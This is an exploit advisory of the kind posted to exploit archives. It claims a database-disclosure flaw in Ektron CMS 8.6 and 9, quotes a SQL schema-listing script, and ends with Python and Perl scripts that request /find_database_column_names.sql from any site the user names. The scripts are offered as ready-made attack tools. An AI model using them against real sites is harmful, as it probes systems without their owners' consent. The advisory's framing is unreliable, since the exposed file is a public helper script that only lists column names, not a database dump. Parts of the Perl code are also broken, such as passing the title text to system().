###########################################################################

# Exploit Title : Ektron CMS 9 Database Disclosure Exploit
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 02/04/2019
# Vendor Homepage : ektron.com
episerver.com/products/platform/ektron/
# Software Download Link : github.com/whanrott/Ektron_sql_scripts/archive/master.zip
# Software Information Link : ektron.com/Products/Web-CMS/Web-Content-Management/
github.com/whanrott/Ektron_sql_scripts
cmsmatrix.org/matrix/cms-matrix/ektron-cms
# Software Affected Versions : 8.6 and 9
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : 
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###########################################################################

# Description about Software :
***************************
Ektron Web Content Management System (CMS) is the platform of choice for more 

than 3,700 global companies. 

Episerver Digital Experience Cloud™ The only platform that puts Digital Content, Commerce 

and Marketing in one screen.

Create, deploy, and manage enterprise-scale, global, personalized websites. Empower users, 

designers, and developers to work in parallel, speeding time-to-web. Make content updates 

directly on the site using an intuitive browser-based editor. Create site wireframes, ensuring global 

brand consistency. Speed development using Ektron's Framework API, pre-built 

.NET controls, and standard development tools like Microsoft Visual Studio.

###########################################################################

# Impact :
***********
* The product stores sensitive information in files or directories that are accessible 

to actors outside of the intended control sphere.

* An information exposure is the intentional or unintentional disclosure of information 

to an actor that is not explicitly authorized to have access to that information.

* This information is highly sensitive and should not be found on a production system.

Information :
*************
Ektron SQL Scripts :

Simple SQL scripts for examining the database of Ektron CMS v9.

Scripts
Script Name  Purpose
find_all_users.sql  
List all users with last login date

find_content_and_folder.sql
List all content, showing folder. Filter by multiple criteria

find_content_history.sql  
Show content item history

find_database_column_names.sql  
query the database structure to find matching tables and column names

find_folder_permissions.sql  
List folder permissions

###########################################################################

Files :
*****
/find_all_users.sql
/find_content_alias_and_template.sql
/find_content_and_folder.sql
/find_content_history.sql
/find_database_column_names.sql
/find_folder_permissions.sql
/find_menu_items.sql
/find_meta_course_accreditation.sql
/find_meta_course_combinations.sql
/find_mismatched_content.sql
/where_is_this_content_used.sql

Information [ find_database_column_names.sql ]
*********************************************
/* look for table column names */

--USE <database name>;

SELECT
     TABLE_NAME
    ,COLUMN_NAME
    ,DATA_TYPE
    ,CHARACTER_MAXIMUM_LENGTH
FROM
    INFORMATION_SCHEMA.COLUMNS
WHERE
--    COLUMN_NAME LIKE '%%'
--AND TABLE_NAME LIKE '%_tbl'
--AND (TABLE_NAME  LIKE '%%' OR COLUMN_NAME LIKE '%template%')
--AND
      (
        COLUMN_NAME LIKE '%%' OR TABLE_NAME LIKE '%%'
      )
AND COLUMN_NAME LIKE '%%'
AND TABLE_NAME NOT LIKE '%_tracking'
ORDER BY
    TABLE_NAME, COLUMN_NAME
;

###########################################################################

# Database Disclosure Information Exposure Exploit 1 :
***********************************************
#!/usr/bin/python
import string
import re
from urllib2 import Request, urlopen
disc = "/find_database_column_names.sql"
url = raw_input ("URL: ")
req = Request(url+disc)
rta = urlopen(req)
print "Result"
html = rta.read()
rdo = str(re.findall("resources.*=*", html))
print rdo
exit

###########################################################################

# Database Disclosure Information Exposure Exploit 2 :
***********************************************
#!/usr/bin/perl -w
# Author : KingSkrupellos
# Team : Cyberizm Digital Security Army

use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('Ektron CMS V.9 Database Disclosure Exploit');
system('color a');


if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
($TargetIP, $path, $File,) = @ARGV;

$File="find_database_column_names.sql";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Wait Please Dear Hacker!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/find_database_column_names.sql");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/find_database_column_names.sql\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}

###########################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###########################################################################